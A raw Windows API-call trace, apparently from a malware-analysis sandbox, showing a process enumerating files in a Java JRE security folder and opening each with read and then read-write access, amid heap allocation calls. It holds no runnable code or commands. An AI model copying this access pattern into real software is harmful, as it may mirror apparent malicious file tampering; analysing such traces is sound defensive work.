ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="trusted.libraries", cAlternateFileName="TRUSTE~1.LIB")) returned 1 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0097.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0097.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.898] AreFileApisANSI () returned 1 [0097.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries", lpUsedDefaultChar=0x0) returned 66 [0097.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0097.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0097.899] AreFileApisANSI () returned 1 [0097.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0097.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x828c8 [0097.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x828c8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 66 [0097.899] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\trusted.libraries"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.900] GetFileType (hFile=0x33c) returned 0x1 [0097.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x828c8 | out: hHeap=0x20000) returned 1 [0097.900] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.900] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.900] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.901] CloseHandle (hObject=0x33c) returned 1 [0097.901] AreFileApisANSI () returned 1 [0097.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0097.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82dd8 [0097.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 66 [0097.901] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\trusted.libraries"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.901] GetFileType (hFile=0x33c) returned 0x1 [0097.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0097.901] CloseHandle (hObject=0x33c) returned 1 [0097.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.903] AreFileApisANSI () returned 1 [0097.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0097.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 66 [0097.903] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\trusted.libraries"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0097.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.903] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="US_export_policy.jar", cAlternateFileName="US_EXP~1.JAR")) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0097.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0097.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0097.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0097.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0097.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0097.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0097.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.904] AreFileApisANSI () returned 1 [0097.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar", lpUsedDefaultChar=0x0) returned 69 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0097.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.904] AreFileApisANSI () returned 1 [0097.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0097.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0097.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 69 [0097.904] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.905] GetFileType (hFile=0x33c) returned 0x1 [0097.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0097.905] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.905] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.905] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.905] CloseHandle (hObject=0x33c) returned 1 [0097.905] AreFileApisANSI () returned 1 [0097.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0097.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0097.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 69 [0097.906] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.906] GetFileType (hFile=0x33c) returned 0x1 [0097.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0097.906] CloseHandle (hObject=0x33c) returned 1 [0097.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 